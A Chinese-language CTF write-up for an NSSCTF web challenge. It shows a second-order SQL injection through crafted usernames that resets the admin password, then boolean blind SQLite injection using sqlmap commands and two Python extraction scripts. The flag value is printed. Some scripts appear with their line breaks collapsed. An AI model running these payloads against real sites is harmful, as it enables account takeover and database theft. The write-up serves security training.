进入注册界面后
假设sql:update user set password = ‘’ where username = ‘’ and password = ‘’
此时如果我们注册的用户名是admin’–+、admin’#、admin’–的话
update user set password = ‘123’ where username = ‘admin’#’ and password = ‘’
1、所以先注册名为:admin’–+的用户,这样就可以直接修改admin密码,登录后,获取cookie
2、用户界面提供查询功能,但是只能查有或没有该用户,而且不会出现报错,说明是sqllite数据库
方法一:sqlmap
尝试利用sqlmap爆破,因为查询是在query层次,且是post,所以我们的sqlmap代码如下:
py sqlmap.py -u "http://node4.anna.nssctf.cn:28138/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZOvyaQ.m7kRbsLxlP5nQfHHxv4WpfnAePQ"
——如果这里的url写错了,是查不到的,而且cookie很重要,非admin的cookie无法进行查询
——查询结果
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1049=1049
py sqlmap.py -u "http://node4.anna.nssctf.cn:28138/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZOvyaQ.m7kRbsLxlP5nQfHHxv4WpfnAePQ" --table
py sqlmap.py -u "http://node4.anna.nssctf.cn:28138/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZOvyaQ.m7kRbsLxlP5nQfHHxv4WpfnAePQ" -T flag --columns
py sqlmap.py -u "http://node4.anna.nssctf.cn:28138/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.ZOvyaQ.m7kRbsLxlP5nQfHHxv4WpfnAePQ" -T flag -C flag --dump
得到flag=NSSCTF{b10c030d-ff18-43ce-b0a8-61cf26d9c070}
方法二:手动盲注+py脚本
用burpsuite抓包,判断id类型,使用id=1 or 1=1,如果是字符型则会提示不存在,但是这里明显可以执行,说明id是数字型
1、构造sql注入语句,由于sqllite数据库,sql的保留字会有所区别
2、SQLite中没有ascii()函数,所以我们盲注时需要直接和字符比较
1 and substr((select group_concat(name) from sqlite_master where type='table'),1,1)='a' —— 查表名
……
脚本:
import requests
from string import *
url="http://1.14.71.254:28287/query"
result=''
str=ascii_letters+digits+"{}-_"
for x in range(38,100):print("this is",x)for i in str:query="-1 or substr((select group_concat(name) from sqlite_master),{},1)>'{}'"#query="-1 or substr((select group_concat(sql) from sqlite_master where name='flag'),{},1)>'{}'"#query="-1 or substr((select flag from flag),{},1)='{}'"data={"id":query.format(x,i)}# print(data)res=requests.post(url=url,data=data)print(res.text)if "exist" in res.text:result+=iprint(result)# flag=Falsebreak
print(result)
脚本2:
import requeststrue_result = 'exist' #正确的回显
url = 'http://1.14.71.254:28033/query'def table_name(url):table_name = ''select = "select name from sqlite_master where type='table' limit 1,1"for i in range(1, 60):tablelength_payload = f'''1 and length(({select}))={i}'''data = {'id':tablelength_payload}response = requests.post(url=url, data=data)if true_result in response.text:print("table length : "+str(i))for j in range(1, i + 1):print('[*]now in {}'.format(j))for asc in range(33, 127):ss = chr(asc)table_payload = f'''id=1 and substr(({select}),{j},1)=\'{ss}\''''data2 = {'id':table_payload}res = requests.post(url=url, data=data2)if true_result in res.text:table_name = table_name + chr(asc)print(table_name)breakbreak
def column_name(url):column_name = ''select = "select sql from sqlite_master where type='table' and name = 'flag'"for i in range(1, 100):columnlength_payload = f'''1 and length(({select}))={i}'''data = {'id':columnlength_payload}response = requests.post(url=url, data=data)if true_result in response.text:print("column length : "+str(i))for j in range(1, i + 1):print("[*]now in {}".format(j))for asc in range(33, 127):ss = chr(asc)column_payload = f'''1 and substr(({select}),{j},1)=\'{ss}\''''data2 = {'id': column_payload}res = requests.post(url=url, data=data2)if true_result in res.text:column_name = column_name + chr(asc)print(column_name)breakbreak
def getflag(url):for i in range(1,60):flag = ''select = "select flag from flag limit 0,1"flaglength = f'''1 and length(({select}))={i}'''data = {'id': flaglength}response = requests.post(url=url, data=data)if true_result in response.text:print("flag length : "+str(i))for j in range(1, i+1):print("[*]now in {}".format(j))for asc in range(33,127):ss = chr(asc)flagpayload = f'''1 and substr(({select}),{j},1)=\'{ss}\''''data2 = {'id': flagpayload}res = requests.post(url=url, data=data2)if true_result in res.text:flag = flag+chr(asc)print(flag)breakbreak
#table_name(url)
#column_name(url)
getflag(url)
